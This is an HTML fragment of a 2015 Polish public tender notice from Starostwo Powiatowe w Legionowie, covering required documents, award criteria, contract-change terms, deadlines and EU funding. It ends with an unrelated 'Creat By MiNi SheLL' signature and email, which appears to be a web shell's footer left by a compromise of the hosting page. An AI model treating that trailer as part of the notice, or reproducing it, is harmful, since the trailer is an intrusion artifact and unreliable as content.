<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają wymaganiom określonym przez Zamawiającego, do oferty należy dołączyć: Parametry techniczne agregatu kogeneracyjnego - Załącznik nr 12 do SIWZ (dotyczy Zadania II).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz Ofertowy - wzór formularza ofertowego Załącznik nr 1 do SIWZ; 2) Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli pełnomocnik został ustanowiony bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie - przedłożone w formie oryginału lub kopii poświadczonej przez notariusza - (jeżeli dotyczy); 3) Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Ustawy, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej, w formie oświadczenia - wzór oświadczenia stanowi Załącznik nr 9. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia listę lub informację, o których mowa powyżej, składa każdy z nich, chyba, że należą do tej samej grupy kapitałowej; 4) Dowód wniesienia wadium (potwierdzenie przelewu, kopia niepieniężnej formy wadium); 5) Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej (jeżeli dotyczy). 6) Zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia, wymagane w przypadku, gdy Wykonawca polega na ich zasobach, na zasadach określonych w art. 26 ust. 2b (jeżeli dotyczy). 7) Oświadczenia innych podmiotów, na których zasobach Wykonawca polega, na zasadach określonych w art. 26 ust. 2b, a podmioty te będą brały udział w realizacji części zamówienia, o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, w okolicznościach, o których mowa w art. 24 ust. 1 Ustawy - wzór oświadczenia stanowi Załącznik nr 3 do SIWZ (jeżeli dotyczy). 8) Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej innych podmiotów, na których zasobach Wykonawca polega, na zasadach określonych w art. 26 ust. 2b, a podmioty te będą brały udział w realizacji części zamówienia, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 Ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (jeżeli dotyczy). 9) Parametry techniczne agregatu kogeneracyjnego - Załącznik nr 12 do SIWZ (dotyczy Zadania II).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 92</li>
<li>2 - Okres gwarancji - 4</li>
<li>3 - Skrócenie terminu wykonania przedmiotu zamówienia - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej z uwzględnieniem podawanych warunków ich wprowadzenia: 1) Zmiany technologiczne, w szczególności konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w Programie Funkcjonalno-Użytkowymi, podyktowane zapewnieniem prawidłowego wykonania robót budowlanych, zastosowaniem innych rozwiązań technicznych lub technologicznych niż wskazane, w szczególności bardziej optymalnych lub nowoczesnych oraz w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem robót. Zmiany te nie mogą powodować zwiększenia całkowitego wynagrodzenia Wykonawcy, mogą być natomiast powiązane z obniżeniem wynagrodzenia, na zasadach określonych przez strony. 2) Podział zadania na części z uwagi na potrzeby Zamawiającego. 3) Kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami - w takim przypadku zmiany w Umowie zostaną ograniczone do zmian koniecznych, powodujących uniknięcie kolizji. 4) Zmiany stawki podatku VAT, na podstawie aktualnie obowiązujących przepisów w tym zakresie. W takim przypadku zmianie ulegnie wyłącznie cena brutto umowy. 5) Zmiany danych Stron (np. zmiana siedziby, adresu, nazwy). 6) Działania siły wyższej lub wystąpienia stanu wyższej konieczności. 7) Zmian zakresu oraz sposobu wykonania przedmiotu umowy na skutek zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia. 8) Zmian zakresu oraz sposobu wykonania przedmiotu umowy na skutek zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia, 9) Omyłek pisarskich lub błędów rachunkowych. 10) Mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami. 11) Dokonania zmian zakresu umowy poprzez wykonanie robót zamiennych na podstawie dwustronnie podpisanych protokołów, jeżeli nie powoduje to zwiększenia wynagrodzenia Wykonawcy. 12) Zmian sposobu wykonania przedmiotu umowy wynikających z warunków uzyskania przez Zamawiającego środków finansowych na realizację przedmiotu zamówienia. Zmiany te nie mogą powodować zwiększenia całkowitego wynagrodzenia Wykonawcy, mogą być natomiast powiązane z obniżeniem wynagrodzenia na zasadach określonych przez strony. 13) Zmian sposobu płatności wynagrodzenia. 14) Terminów realizacji przedmiotu umowy, w przypadku: a) podziału zadania na części z uwagi na potrzeby Zamawiającego; b) wystąpienia okoliczności niezależnych od Wykonawcy, przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy; c) wystąpienia okoliczności spowodowanych przyczynami leżącymi po stronie Zamawiającego, w szczególności wstrzymanie robót przez Zamawiającego, wprowadzenie rozwiązań projektowych zamiennych, konieczność przeprojektowania pewnych rozwiązań; d) wystąpienia innych przyczyn niezależnych od Zamawiającego oraz Wykonawcy skutkujących niemożliwością prowadzenia prac; e) jeżeli stanie się to konieczne ze względu na okoliczności trudne do przewidzenia na etapie podpisania umowy, a wynikłe w trakcie realizacji zadania, w szczególności: w przypadku wykonania robót zamiennych lub konieczności wykonania robót dodatkowych niezbędnych do zakończenia zadania, konieczności innego niż pierwotnie przewidziany sposobu zagospodarowania odpadów, zaistnienia przeszkód w wejściu na teren robót spowodowanych przyczynami niezależnymi od Wykonawcy, niezależnych od Wykonawcy opóźnień w uzyskaniu zezwolenia lub pozwolenia na wykonywanie prac budowlanych; f) wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów; g) wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da się przewidzieć, np. huragan, powódź, stan wojenny, działania wojenne itp.; h) przedłużenia procedury uzyskiwania opinii, uzgodnień, pozwoleń z przyczyn niezależnych od Wykonawcy, tj. z powodu niezachowania terminów administracyjnych przez organy i instytucje; i) wykonania robót zamiennych, bez zmiany wynagrodzenia należnego wykonawcy, na podstawie dwustronnie podpisanych protokołów; j) zmian warunków uzyskania przez Zamawiającego środków finansowych na realizację przedmiotu zamówienia; k) zmian sposobu wykonania przedmiotu umowy, podyktowane zapewnieniem prawidłowego wykonania robót budowlanych, zastosowaniem innych rozwiązań technicznych lub technologicznych niż wskazane w projekcie, w szczególności bardziej optymalnych lub nowoczesnych, oraz w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem robót; l) zmian zakresu oraz sposobu wykonania przedmiotu umowy na skutek zmian organizacyjnych Zamawiającego mających miejsce po podpisaniu umowy, powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia; m) zmian zakresu oraz sposobu wykonania przedmiotu umowy na skutek zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia. 15) Wyboru przez Zamawiającego podmiotu trzeciego, pełniącego funkcję Inwestora zastępczego, w zakresie dostosowania umowy do warunków tej zmiany. 2. Postanowienia wymienione powyżej stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, lecz nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie. 3. Zmiana umowy może być dokonana za porozumieniem stron wyłącznie w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arslegis.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kancelaria Prawna ARS LEGIS, ul. Śniadeckich 21 lok. 7, 00-654 Warszawa tel: 22-46-80-304, fax: 22-46-80-304, e-mail: zamowienia.publiczne@arslegis.waw.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2015 godzina 10:00, miejsce: Siedziba Zamawiającego tj. Starostwo Powiatowe w Legionowie, ul. Sikorskiego 11, 05-119 Legionowo (Kancelaria na parterze przy wejściu głównym).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W imieniu i na rzecz Zamawiającego działa Pełnomocnik Zamawiającego, zgodnie z art. 15 ust. 2 ustawy, którym jest: Grzegorz Łopata, ARS LEGIS Kancelaria Prawna, ul. Nowodworska 29 lok. 103, 03-133 Warszawa adres korespondencyjny: Kancelaria Prawna ARS LEGIS, ul. Śniadeckich 21 lok. 7, 00-654 Warszawa.  Warunki, co do sposobu prowadzenia prac: Praca prowadzona będzie w obiektach czynnych. Nie jest dopuszczalne prowadzenie prac w sposób zakłócający dostarczenie energii elektrycznej, energii cieplnej i wody do obiektów. Wyłączenia dostaw energii elektrycznej, energii cieplnej i wody mogą odbywać się jedynie w nocy. W uzasadnionych przypadkach wyłączenia dostaw energii elektrycznej, energii cieplnej i wody mogą odbywać się po wcześniejszym szczegółowym uzgodnieniu ze służbami technicznymi użytkowników obiektów i muszą być ograniczone do niezbędnego minimum. W przypadku wyłączenia dostawy energii elektrycznej z sieci elektroenergetycznej Wykonawca, w zakresie uzgodnionym z Zamawiającym, zapewni na swój koszt zasilenie obiektów z agregatu prądotwórczego. Warunki, co do finansowania prac: Zamawiający zastrzega sobie prawo rezygnacji z realizacji zamówienia w zakresie dotyczącym zadania I i/lub zadania II, jeżeli Zamawiający nie uzyska środków finansowych, które zamierzał przeznaczyć na realizację przedmiotu zamówienia. W takim przypadku, jeżeli środki pochodzące z budżetu Unii Europejskiej oraz niepodlegające zwrotowi środki z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane, Zamawiający może unieważnić postępowanie o udzielenie zamówienia na podstawie art. 93 ust. 1a Ustawy. Warunki, co do terminów realizacji prac: Podpisanie umowy i rozpoczęcie realizacji inwestycji nastąpi po zawarciu przez Zamawiającego umowy z Bankiem Gospodarstwa Krajowego na dofinansowanie realizacji zadań ze środków finansowych w ramach inicjatywy JESSICA, które zamierza przeznaczyć na realizację przedmiotu zamówienia. Ze względu na warunki uzyskania środków finansowych w ramach inicjatywy JESSICA, wdrażanej w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2007-2013, nieprzekraczalny termin zakończenia realizacji inwestycji (data podpisania protokołu odbioru) to 30.10.2015 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com